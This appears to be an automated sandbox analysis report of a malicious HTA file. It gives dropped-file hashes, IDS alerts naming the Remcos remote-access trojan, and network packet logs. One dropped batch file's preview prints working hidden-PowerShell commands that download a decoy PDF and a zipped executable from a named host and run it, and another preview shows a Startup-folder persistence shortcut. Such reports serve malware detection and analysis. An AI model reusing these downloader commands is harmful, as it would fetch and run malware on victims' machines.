SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\cleanup.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	4.821837976420847
Encrypted:	false
SSDEEP:	3:mKDDCMN2RuXcov2lOt+kiE2J5xAIhMS2Lr5+Vovu9LsB8SAlOt+kiE2J5xAIziQp:hWK2vo+cwkn23fhnKdqo29LiXwkn23fZ
MD5:	6EF1EF813A19AE723C47C634175686F6
SHA1:	08B33DB9B60397E1FCE1401623525961AD93D3CF
SHA-256:	EE1ED5C1D79613338208C48665A128B7C49CEAD655C8235E6ADED6DD053E0350
SHA-512:	38A81019CF124C80D48264E0AD0F89179F819684017F138A3F487FB7010D8DD736E289CFD21996C7D02CFA623C10FCA04BDB63F3BD4772D21860B8D5BA640284
Malicious:	false
Preview:	@echo off..timeout /t 10 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3327835
Entropy (8bit):	5.758434429410112
Encrypted:	false
SSDEEP:	24576:N0rA6ahiIQlCG6xs6b/dCMnimOP0TBepVjSIZFMw+zK1QAqcqINtBb:N0r5D6W6bhniN0TBejtyw7lqIjBb
MD5:	3C97EDF50C43DEA05A8D6704560E93C3
SHA1:	BC350C8344241207C13CE9B777014FEE5035E102
SHA-256:	F8DA5138B7D263F65764322238671548576394E132044F5FFC8481ECCA55CFB0
SHA-512:	AF8FD5AB1EFFBFB789705834F4502B60122E919C8DC3D89508F14691CE688C00DE9A04D128997D51ACF260EA229E9C30DDFC95F3F91E4047500AE56383B77AE4
Malicious:	true
Preview:	PK.........%'ZI.....2..).#....msword.exe..\|T.?~.G.l.E...4BP....(qA......f........s...M8Ie=....jkoM..mm...... .J-...5".Y7.1,.9..3......y......3.g.y~..9.o.X.I.dG2MIj..O......\.........2...,.-^.z.=....;W.X....x...x...[....\.tb^^NI....~..Y..2%..wM.......S~..%..L..c...u....n..ep..4.-..P?'S.%Y-...IZ... I.!I:.p#...O...K.$......\|<.5.{w......7....e\|...-wKO.^w%2O.........Ao.?.<Q].N..w.J.!...\.bIZ<q..;.;%.$1..H.....L.~...U.....N\..t;$.t..U.....v...s..6./p}.\8...z..... R.%.2.r>......_..2....z....o.!.kyze...;8a.....L.mjNSs...7....1...1....c.S...a<..HQ......GQf.%..I..Y^..Qt.z..V....f.e....m..\|.....]..u9.r>.......~fk.s...mT.p........r.{.^..{.Q..,.D........i.<..L-.<...^V.\.W....7.T..k&...Q...Z........cn ..30.d...`...6.n..m...!.6.).H.?b...@i...G'..~...$..-...w.[2f....i...b.$..Y..;.jU(....cz'w.im.....<Vnq..Go.U..J\..fW.....i.Z.p....\.o....[<...VdQ......X.p...}.\.....~C...z..v.px....>P.i..,.;.Az.h.c.. ...e.........a!Dr".[.S ...>...6.j3..6...

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	597698952
Entropy (8bit):	4.334658930012718
Encrypted:	false
SSDEEP:
MD5:	BE34E4B65EDA2DFBCBBCC9FF5DFAE81F
SHA1:	F2FD41C71B2DD94884586D35EBABC31EAB5C864A
SHA-256:	49392F5BE44F57FCD7E91DF566FA4A3544174EF83E2B66768B04EA7A4AD774D1
SHA-512:	7F433D2FE6BC8AB97D96761A1AE14615C9EED278BCAAE591B3E85EA89279CA77F845715644DF27349FC1094E69A4D21A1604F5B36787EDE45589C262B6D3E108
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n...j...B...8............@.................................\|2....@.................................4........@..~..............#x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...~....@......................@..@.reloc..2............N..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	498
Entropy (8bit):	5.198499125177484
Encrypted:	false
SSDEEP:	12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
MD5:	E8DFDB915A523A09E139AAA900991DDD
SHA1:	D23F4798C549BFB7DDD968C4C2A971F67468A662
SHA-256:	91619737B3F7AF4623DC62B4F3DF7B551337EC94F693A3B9BA35BB231483393E
SHA-512:	B4E737D1C80420688BF856DF02A580B691D120307B7D31EA4766448CCD0C6EEC7B2C48424691E92DFFBA58CA8C9A8DF989F5B683D9363CAC37D3DD3E5AD1623E
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.889436845812483
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
MD5:	A34A0DAF277C13FC5AFF64C0A7247999
SHA1:	FD9B47B23BD20B9903D8842AC8C17A9F96677E93
SHA-256:	1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
SHA-512:	7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..

C:\Users\user\Downloads\W2.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 1 pages
Category:	dropped
Size (bytes):	393964
Entropy (8bit):	7.894863553506209
Encrypted:	false
SSDEEP:	6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
MD5:	57F09EA46C7039EA45BB3FD01BBD8C80
SHA1:	1365FF5E6E6EFC3E501D350711672F6A232AA9F8
SHA-256:	3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
SHA-512:	6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
Malicious:	true
Preview:	%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.176025638229203
Encrypted:	false
SSDEEP:	3:hYFEHgAR+mQRKVxLZtFctFst3g4t32vov:hYFEmaNZM3MXt3X
MD5:	74D8C80188CB3C2AFD82E1821813B1CB
SHA1:	EEB1D7DC1821B7841EE50BC53AFF890544ECFBDA
SHA-256:	970057AABB3408E53F34A42FEF79D515688F7C1BBEA0567C1BF9B477B53F3AC2
SHA-512:	677341DE20037DD57D34587520DF436CFE3DFB09824AC4926F0BAC3B428B3FACB2007CADC74254879736195E4573D44AB88DE80E52D1A559C7096E7F9587A5BE
Malicious:	false
Preview:	..Waiting for 10 seconds, press a key to continue ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65234), with CRLF line terminators
Entropy (8bit):	4.703484669260988
TrID:	HyperText Markup Language (12001/1) 40.67% HyperText Markup Language (11501/1) 38.98% HyperText Markup Language (6006/1) 20.35%
File name:	c2.hta
File size:	80'884 bytes
MD5:	5c4995910d7c98dad7366a0519fe4558
SHA1:	c9ed46e4dcc3e24e484b16d2896e5b2c15595ad5
SHA256:	2ca1167b2c7a42f82c22c1349ce52569820fb0416463e60262b5481ac4926e0a
SHA512:	51bf112ce906df871e68620e0af8bd43cecd72a296054c0fdd6f3f07250668d33277f66725631ef68f8ba8d1304cbbccd6284a9d73323ef1ae19f977c9c208e6
SSDEEP:	768:O0cJbc1rmDYpxPJOT90Qg9iJrCufW0UYckMCRcZmy2U072dtxZ:f6bctm8D4T9FhWVRUUtf
TLSH:	6C83EB961E28EDD0338F7979BEAC618012D0DB6F6FB395A1D04BC5B12F219A874047B3
File Content Preview:	<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes"...SHOWINTASKBAR="no"

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T06:23:01.619350+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49734	193.26.115.39	443	TCP
2025-01-07T06:23:05.236348+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49736	193.26.115.39	443	TCP
2025-01-07T06:24:10.520484+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49827	193.26.115.39	7009	TCP
2025-01-07T06:24:11.640540+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49835	178.237.33.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:22:58.232995033 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.233036995 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:58.233171940 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.266812086 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.266836882 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:58.787086964 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:58.787208080 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.914525986 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.914550066 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:58.914825916 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:58.914942980 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.918989897 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:58.959332943 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:59.043926954 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:59.044023991 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:59.044034004 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:59.044131994 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:22:59.044147968 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:59.044223070 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:59.046407938 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:22:59.046420097 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:00.909945011 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:00.909991980 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:00.910064936 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:00.917815924 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:00.917829990 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.459408045 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.459487915 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.462342978 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.462359905 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.462590933 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.471827984 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.519335985 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.619379997 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.619409084 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.619461060 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.619472980 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.674978018 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.714108944 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.714117050 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.714159012 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.714170933 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.714183092 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.714188099 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.714229107 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.715595961 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.715614080 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.715666056 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.715672016 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.715742111 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.804538965 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.804557085 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.804646969 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.804657936 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.806498051 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.807059050 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.807075977 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.807116985 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.807121038 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.807147980 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.807166100 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.808912992 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.808928967 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.808979034 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.808984041 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.810499907 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.810722113 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.810740948 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.810782909 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.810787916 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.810831070 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.810853004 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.896917105 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.896935940 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.897155046 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.897164106 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.897213936 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.897478104 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.897492886 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.897537947 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.897547007 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.897573948 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.897592068 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.898050070 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.898065090 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.898108959 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.898113966 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.898156881 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.898996115 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899010897 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899071932 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.899077892 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899158001 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.899806023 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899821997 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899864912 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.899868965 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.899897099 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.899913073 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.900813103 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.900830030 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.900863886 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.900872946 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.900893927 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.900907040 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.901034117 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.901050091 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.901093960 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.901099920 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.901149035 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.909671068 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989320993 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989336967 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989491940 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989499092 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989548922 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989559889 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989569902 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989600897 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989629984 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989634037 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989660978 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989676952 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989878893 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989892960 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989937067 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.989942074 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.989991903 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990238905 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990252972 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990305901 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990312099 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990432024 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990449905 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990456104 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990467072 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990485907 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990520954 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990736008 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990751028 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990787029 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990791082 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.990808964 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.990827084 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.991090059 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991101980 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991153002 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.991158009 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991245031 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.991405964 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991420031 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991475105 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.991481066 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:01.991529942 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:01.993572950 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.081923962 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.081944942 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082015038 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.082020998 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082091093 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.082215071 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082228899 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082278967 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.082283020 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082349062 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082350016 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.082359076 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082407951 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.082412004 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082421064 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:02.082458973 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.140454054 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:02.276951075 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.425813913 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.425848007 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:04.425973892 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.442725897 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.442744970 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:04.972309113 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:04.972462893 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.974384069 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:04.974396944 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:04.974622965 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:05.093929052 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:05.139333963 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:05.236371994 CET	443	49736	193.26.115.39	192.168.2.4
